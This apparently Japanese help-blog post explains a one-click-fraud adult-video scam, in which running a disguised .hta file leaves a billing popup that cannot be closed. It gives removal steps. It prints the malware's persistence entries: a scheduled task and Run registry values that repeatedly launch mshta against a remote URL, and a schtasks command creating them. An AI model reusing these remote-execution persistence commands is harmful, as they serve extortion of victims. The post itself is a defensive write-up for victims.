ノートパソコン dynabook が 
5万円台から♪[登録請求画面消えない] VIDEO Channel ビデオチャンネル - アダルト動画ウイルス配信型ワンクリック詐欺
あー、ウイルスを実行しちゃいましたね。”エッチなAV映像”という名目で実行するよう促されたものは動画ファイルではなくウイルスです。エロいことであなたの頭の中は一杯だったんでしょうが、ちゃんと拡張子を見ましたか? 「~.wmv」「~.avi」とかではなく「~.hta」だったはずです。わざわざ自らの意思でウイルスを実行するから、パソコンの設定が改竄されデスクトップに入会登録料金請求の変態ポップアップ画面が強制表示されサッパリ消えない感染症状となったわけです。今現在ウイルスというのは、”金儲け”の手段として使われてます。 
◇ 『有料アダルト動画をご利用いただきありがとうございます ご入会が完了しました』
タスクスケジューラ の上位フォルダに 4 つのデータを確認しました
(※テスト不足のため怪しさポイントは誤判定する可能性あり)【タスク4】
名前: Quicktime
操作: C:\windows\system32\mshta h**p://bill1.douga-ddd.info/User/bill53/mov5375/
状態: 準備完了
繰り返し間隔: PT1M [1分]
作成者: (ユーザー名)
作成日時: 2012-01-**T21:25:37
怪しさ ⇒ 10 ポイント【タスク3】
名前: GoogleUpdateTaskMachineUA
操作: C:\Program Files\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
状態: 無効
繰り返し間隔: PT3600S [3600秒]
作成者: (ユーザー名)
作成日時: (データなし)
怪しさ ⇒ 0 ポイント【タスク2】
名前: GoogleUpdateTaskMachineCore
操作: C:\Program Files\Google\Update\GoogleUpdate.exe /c
状態: 無効
繰り返し間隔: (データなし)
作成者: (ユーザー名)
作成日時: (データなし)
怪しさ ⇒ 0 ポイント【タスク1】
<無関係なため省略>■ ■ ■ ■ ■ ■ ■ ■ ■ ■
レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
2 つのデータを確認しました [2012/01/** 21:18]【キー2】
名前: Quicktime-3
データ: schtasks /create /TN Quicktime /tr "C:\windows\system32\mshta h**p://bill1.douga-ddd.info/User/bill53/mov5375/" /F /sc minute /mo 1
怪しさ ⇒ 20 ポイント
更新日時 ⇒ 確認不要(Webアドレス)【キー1】
名前: Quicktime
データ: C:\windows\system32\mshta.exe h**p://bill1.douga-ddd.info/User/bill53/mov5375/
怪しさ ⇒ 20 ポイント
更新日時 ⇒ 確認不要(Webアドレス)■ ■ ■ ■ ■ ■ ■ ■ ■ ■
OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html■ ■ ■ ■ ■ ■ ■ ■ ■ ■
- 診断結果確認 【~が消えない.exe】
- [Windows Vista/7のみ] タスクスケジューラで該当1項目削除 (怪しさ判定10p) ※1
- レジストリエディタでRunキーの該当項目削除 (怪しさ判定20p) ※2
- パソコンを再起動して反省会
※1 ウイルス実行後に1度でもパソコンを起動し直してたらタスクスケジューラが悪用される。起動し直してなければ該当項目はないはず。
※2 Windows Vista/7の登録は2項目。Windows XPは上で言うところの【キー2】に相当する登録は行われないかもしれないので1項目?(コチラで感染させてないため挙動分からん)
